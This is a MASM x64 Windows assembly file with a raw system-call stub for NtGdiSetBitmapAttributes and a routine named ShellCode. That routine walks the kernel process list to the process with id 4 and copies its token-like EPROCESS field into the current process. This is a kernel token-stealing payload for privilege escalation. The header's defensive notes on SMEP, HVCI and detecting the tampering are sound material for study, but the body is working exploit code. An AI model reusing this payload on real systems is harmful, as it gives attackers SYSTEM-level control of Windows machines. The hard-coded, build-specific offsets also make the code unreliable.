;-----------------------------------------------------------------------
; Syntax: MASM (ml64), x64 Windows.
;
; Two exported routines:
;   NtGdiSetBitmapAttributes - raw system-call stub with a hard-coded
;                              service number.
;   ShellCode                - copies one pointer-sized EPROCESS field
;                              from the process whose id is 4 into the
;                              current process.
;
; Every structure offset and the service number are literal constants.
; They are not stable across Windows builds, so the routine is tied to
; whatever kernel layout the author targeted (not stated in the source).
;
; Defensive notes:
;   - ShellCode dereferences kernel structures, so it only makes sense
;     when run in kernel context. Controls that stop user-mapped code
;     from running at ring 0 (SMEP, HVCI) address that precondition.
;   - The visible result is a process sharing the field value of
;     process id 4. Comparing that field across processes is one way
;     to spot the tampering afterwards.
;-----------------------------------------------------------------------
PUBLIC  NtGdiSetBitmapAttributes
PUBLIC  ShellCode

; NOTE(review): the source shows no matching `_TEXT ENDS`; left as found.
_TEXT   SEGMENT

;-----------------------------------------------------------------------
; NtGdiSetBitmapAttributes
; In:    rcx, rdx = first two arguments (Microsoft x64 convention)
; Out:   rax = value returned by the system call
; Clobb: r10, r11, rcx (SYSCALL itself overwrites rcx and r11)
;-----------------------------------------------------------------------
NtGdiSetBitmapAttributes PROC
        mov     r10, rcx                ; kernel reads arg 1 from r10; SYSCALL clobbers rcx
        mov     r11, rdx                ; SYSCALL reloads r11 with RFLAGS, so this write is not seen by the kernel
        mov     eax, 125fh              ; hard-coded service number; build-specific
        syscall
        ret
NtGdiSetBitmapAttributes ENDP

;-----------------------------------------------------------------------
; ShellCode
; In:    none
; Out:   rax = the value that was copied
; Saves: rdx, rdi, rcx (pushed on entry, popped in reverse order on exit)
; Regs:  rdi = current process object
;        rdx = current list-entry pointer (object base + 188h)
;        rcx = id read from the entry under inspection
;-----------------------------------------------------------------------
ShellCode PROC
        push    rdx
        push    rdi
        push    rcx

        mov     rax, qword ptr gs:[188h]        ; presumably the current thread object
        mov     rax, qword ptr [rax + 70h]      ; current process's EPROCESS (per the original comment)
        mov     rdi, rax                        ; keep it; rax is reused below
        mov     rdx, qword ptr [rax + 188h]     ; rdx = forward link of the process list

        ; Follow forward links until the qword 8 bytes before the link
        ; (presumably the process id) equals 4. There is no other exit
        ; condition.
find_system:
        mov     rcx, qword ptr [rdx - 8]
        cmp     rcx, 4
        je      found_system
        mov     rdx, qword ptr [rdx]            ; advance to the next entry
        jmp     find_system

found_system:
        ; rdx = matching object + 188h, so rdx + 80h is that object's
        ; +208h field, the same field written in the current process.
        ; Presumably the token pointer; the original comment is truncated.
        mov     rax, qword ptr [rdx + 80h]
        mov     qword ptr [rdi + 208h], rax

        pop     rcx
        pop     rdi
        pop     rdx
        ret
ShellCode ENDP

        END